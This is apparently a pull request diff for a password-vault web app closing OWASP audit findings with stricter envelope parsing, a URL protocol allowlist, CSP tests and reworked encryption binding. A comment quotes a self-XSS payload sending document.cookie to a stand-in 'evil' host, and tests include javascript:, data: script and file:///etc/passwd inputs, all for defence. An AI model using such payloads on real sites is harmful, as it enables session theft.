+      expect(() => parseEnvelope("psoenc1:1.0:aaaa")).toThrow(/invalid version/);
+    });
+
+    it("rejects ' 1' (leading whitespace)", () => {
+      expect(() => parseEnvelope("psoenc1: 1:aaaa")).toThrow(/invalid version/);
+    });
+
+    it("rejects '01' (leading zero, except bare 0)", () => {
+      expect(() => parseEnvelope("psoenc1:01:aaaa")).toThrow(/invalid version/);
+    });
+
+    it("rejects '0x1' (hex prefix)", () => {
+      expect(() => parseEnvelope("psoenc1:0x1:aaaa")).toThrow(/invalid version/);
+    });
+
+    it("rejects '1e2' (scientific notation)", () => {
+      expect(() => parseEnvelope("psoenc1:1e2:aaaa")).toThrow(/invalid version/);
+    });
   });
 
   // ─── AAD-substitution rejection (security obligation 2) ────────

--- a/src/lib/crypto/envelope.ts
+++ b/src/lib/crypto/envelope.ts
@@ -28,6 +28,13 @@ export function isEncryptedEnvelope(stored: string): boolean {
   return stored.startsWith(SENTINEL);
 }
 
+// A08-4: strict integer regex. Number() is too tolerant — accepts "1.0",
+// " 1", "0x1", scientific notation, etc. — any of which could mismatch
+// the stored key version if an attacker controlled the envelope string.
+// GCM tag would still catch it (AAD includes version), but explicit
+// rejection prevents version aliasing at the parse layer.
+const VERSION_RE = /^(0|[1-9][0-9]*)$/;
+
 export function parseEnvelope(stored: string): ParsedEnvelope {
   const rest = stored.slice(SENTINEL.length);
   const colonIdx = rest.indexOf(":");
@@ -35,10 +42,10 @@ export function parseEnvelope(stored: string): ParsedEnvelope {
     throw new Error("Malformed encrypted account token: missing version delimiter");
   }
   const versionStr = rest.slice(0, colonIdx);
-  const version = Number(versionStr);
-  if (!Number.isInteger(version) || version < 0) {
+  if (!VERSION_RE.test(versionStr)) {
     throw new Error(`Malformed encrypted account token: invalid version "${versionStr}"`);
   }
+  const version = parseInt(versionStr, 10);
   const blob = Buffer.from(rest.slice(colonIdx + 1), "base64url");
   if (blob.length < IV_LENGTH + AUTH_TAG_LENGTH + 1) {
     throw new Error("Malformed encrypted account token: blob too short");

--- a/src/lib/security/csp-builder.test.ts
+++ b/src/lib/security/csp-builder.test.ts
@@ -122,6 +122,27 @@ describe("csp-builder", () => {
       );
     });
 
+    it("A05-2: loopback wildcards stay scoped to form-action (no leak to other directives)", async () => {
+      const { buildCspHeader } = await import("./csp-builder");
+      const header = buildCspHeader("nonce");
+      // Every directive that should NOT receive loopback wildcards. If a
+      // future refactor accidentally widens connect-src / script-src / etc.
+      // to the loopback-everywhere set, this test catches it before merge.
+      for (const directive of [
+        "connect-src",
+        "script-src",
+        "style-src",
+        "img-src",
+        "frame-src",
+        "frame-ancestors",
+        "default-src",
+      ]) {
+        // Match e.g. "connect-src ... http://localhost:* ..." — should NOT appear.
+        const re = new RegExp(`${directive}[^;]*http://localhost:\\*`);
+        expect(header).not.toMatch(re);
+      }
+    });
+
     it("includes report-to and report-uri directives", async () => {
       const { buildCspHeader } = await import("./csp-builder");
       const header = buildCspHeader("nonce");

--- a/src/lib/security/safe-href.test.ts
+++ b/src/lib/security/safe-href.test.ts
@@ -1,0 +1,32 @@
+import { describe, it, expect } from "vitest";
+import { isSafeHref } from "./safe-href";
+
+describe("isSafeHref", () => {
+  it("accepts http/https/mailto", () => {
+    expect(isSafeHref("http://example.com")).toBe(true);
+    expect(isSafeHref("https://example.com/path?q=1")).toBe(true);
+    expect(isSafeHref("mailto:user@example.com")).toBe(true);
+  });
+
+  it("rejects javascript: scheme (self-XSS vector)", () => {
+    expect(isSafeHref("javascript:alert(1)")).toBe(false);
+    expect(isSafeHref("JavaScript:alert(1)")).toBe(false);
+  });
+
+  it("rejects data: scheme", () => {
+    expect(isSafeHref("data:text/html,<script>alert(1)</script>")).toBe(false);
+  });
+
+  it("rejects file: / ftp: / chrome: / about:", () => {
+    expect(isSafeHref("file:///etc/passwd")).toBe(false);
+    expect(isSafeHref("ftp://example.com")).toBe(false);
+    expect(isSafeHref("chrome://settings")).toBe(false);
+    expect(isSafeHref("about:blank")).toBe(false);
+  });
+
+  it("rejects unparseable strings (relative URLs, garbage)", () => {
+    expect(isSafeHref("not a url")).toBe(false);
+    expect(isSafeHref("/relative/path")).toBe(false);
+    expect(isSafeHref("")).toBe(false);
+  });
+});

--- a/src/lib/security/safe-href.ts
+++ b/src/lib/security/safe-href.ts
@@ -1,0 +1,24 @@
+/**
+ * URL protocol allowlist for `<a href={value}>` insertion (A03-1).
+ *
+ * Personal vault entries store arbitrary URL strings. Even though the
+ * owner is the only one who can write to their vault, rendering the
+ * value into an `href` without protocol filtering allows a self-XSS
+ * payload (`javascript:fetch('//evil/' + document.cookie)`) to fire
+ * when the user clicks the link. Share-view enforced this before;
+ * the owner-view did not — A03-1 collapses both to this helper.
+ *
+ * Acceptable protocols: http, https, mailto. Anything else (including
+ * relative URLs that fail to parse) returns false so the caller can
+ * render the value as plain text instead of an anchor.
+ */
+
+const SAFE_PROTOCOLS = new Set(["http:", "https:", "mailto:"]);
+
+export function isSafeHref(url: string): boolean {
+  try {
+    return SAFE_PROTOCOLS.has(new URL(url).protocol);
+  } catch {
+    return false;
+  }
+}

--- a/src/lib/vault/admin-reset-token-crypto.ts
+++ b/src/lib/vault/admin-reset-token-crypto.ts
@@ -1,17 +1,21 @@
 // At-rest encryption for the dual-approval admin-vault-reset email-link token.
 //
-// AAD binding:
-//   AES-256-GCM AAD is set to `<tenantId>:<resetId>:<targetEmailAtInitiate>`.
-//   This binds the ciphertext to the specific reset row + target user's email
-//   at initiate time so:
-//     - A stolen ciphertext cannot be substituted into a different reset row.
-//     - An admin who initiated the reset cannot continue to use the email-link
-//       token if the target user changed their email between initiate and
-//       approve (FR12).
+// AAD binding (A02-7):
+//   AES-256-GCM AAD is encoded via the shared length-prefixed binary format
+//   (buildAADBytes) under scope `AR` with 3 fields. Length-prefixed encoding
+//   eliminates the delimiter-collision risk of the previous `tenantId:resetId:
+//   email` string form: if a future identifier format introduces ':' the
+//   wrong-shape AAD would silently match. Length prefixes make field
+//   boundaries unambiguous regardless of field content.
 //
-//   AAD bytes are opaque to AES-GCM — never re-parsed. Email may contain ':'
-//   per RFC 5322 §3.4.1 quoted-local-part; this is fine because we never split
-//   the AAD back, only compare bytes for equality during decryption.
+//   The binding still locks each ciphertext to:
+//     - the specific reset row (resetId) — substitution across rows fails
+//     - the target user's email at initiate (targetEmailAtInitiate) — if the
+//       target user changes their email after initiate, decryption fails (FR12)
+//
+// Pre-1.0 wire-format change: pending reset tokens encrypted with the old
+// string AAD will not decrypt and must be re-initiated. Reset TTL is short
+// (hours) so the impact window is bounded.
 //
 // Storage format:
 //   `psoenc1:<keyVersion>:<base64url(iv || authTag || ciphertext)>`
@@ -29,6 +33,9 @@ import {
   getCurrentMasterKeyVersion,
   getMasterKeyByVersion,
 } from "@/lib/crypto/crypto-server";
+import { buildAADBytes } from "@/lib/crypto/crypto-aad";
+
+const SCOPE_ADMIN_RESET = "AR";
 
 export type AdminResetAad = {
   tenantId: string;
@@ -38,8 +45,11 @@ export type AdminResetAad = {
 
 function buildAad(aad: AdminResetAad): Buffer {
   return Buffer.from(
-    `${aad.tenantId}:${aad.resetId}:${aad.targetEmailAtInitiate}`,
-    "utf8",
+    buildAADBytes(SCOPE_ADMIN_RESET, 3, [
+      aad.tenantId,
+      aad.resetId,
+      aad.targetEmailAtInitiate,
+    ]),
   );
 }
 


### PR DESCRIPTION
## Summary

Closes 14 of the 17 Low/Info findings from the 2026-05-21 OWASP Top 10 audit. Three larger Low items (A02-8 PRF salt, A07-4 MCP DCR public/confidential split, A08-3 anchor publisher startup gate) deferred to separate PRs per scope discussion.

### In-scope (11 Low + 3 Info)

| # | Sev | Subject |
|---|---|---|
| A03-1 | Low | Extract `isSafeHref` to `src/lib/security/safe-href.ts`; owner login section now filters `javascript:` / `data:` schemes (was only enforced on share-view) |
| A01-4 | Low | Collapse 403 → 404 on owner-mismatch routes — no existence oracle. 6 sites updated |
| A01-3 | Low | `DELETE /api/passwords/[id]?permanent=true` now requires `requireRecentCurrentAuthMethod()` step-up |
| A02-7 | Low | `admin-reset-token-crypto` AAD uses length-prefixed `buildAADBytes` (new scope `AR`). Pre-1.0 wire-format break for in-flight reset tokens |
| A02-6 | Low | `hashAccessPassword` enforces 43-char generated-token length invariant; user-chosen passwords would now throw instead of silently hitting the fast-hash path |
| A08-4 | Low | `parseEnvelope` uses strict `/^(0|[1-9][0-9]*)$/` regex; rejects `"1.0"`, `" 1"`, `"01"`, `"0x1"`, `"1e2"` |
| A07-5 | Low | `invalidateUserSessions` emits Sentry alert + structured log when `cacheTombstoneFailures > 0` |
| A05-2 | Low | New negative regression test: CSP loopback wildcards (form-action 'self' + http://localhost:* + …) MUST NOT leak to connect-src / script-src / frame-src / etc. |
| A06-5 | Low | extension lockfile drift fix: package.json/lockfile both at 0.4.51 |
| A09-6 | Low | `csp-report` route emits `_logType: "csp.violation"` to match the SIEM queries in `docs/operations/alerts.md` |
| A01-5 | Info | `.env.example` sidecar comment for `GOOGLE_WORKSPACE_DOMAINS` calls out Account Linking attack vector when empty |
| A07-6 | Info | Opt-in CHIPS `partitioned: true` on session cookie via `COOKIE_PARTITIONED=true` (no current effect, raises browser-side defense ceiling for future embed paths) |
| A09-5 | Info | `docs/operations/alerts.md` adds "External Timestamp Anchors" section enumerating Sigstore Rekor / Public NTS / AWS QLDB / SIEM ingest as concrete destinations |

### Deferred (separate PRs)
- A02-8 (Low) WebAuthn PRF per-credential salt — needs migration + E2E
- A07-4 (Low) MCP DCR confidential client restriction — design change splitting registration paths
- A08-3 (Low) Production startup `AUDIT_ANCHOR_PUBLISHER_ENABLED` env gate

### Bonus

Touching `crypto-server.test.ts` for A02-6 surfaced 11 pre-existing
`process.env.X = …` mutations that the pre-pr hygiene gate
(check-test-hygiene.sh) flags. Converted to `vi.stubEnv` per
`feedback_no_skip_existing_code`. Tests still 73/73 green.

## Test plan

- [x] `npx vitest run` — 874/874 files, 10481 passed (1 pre-existing skip)
- [x] `npx next build` — production build succeeds
- [x] `npx eslint .` — 0 errors
- [x] `bash scripts/pre-pr.sh` — 19/19 checks pass
- [x] Local migration verification: no new migrations in this PR (pure code/test/docs changes)

🤖 Generated with [Claude Code](https://claude.com/claude-code)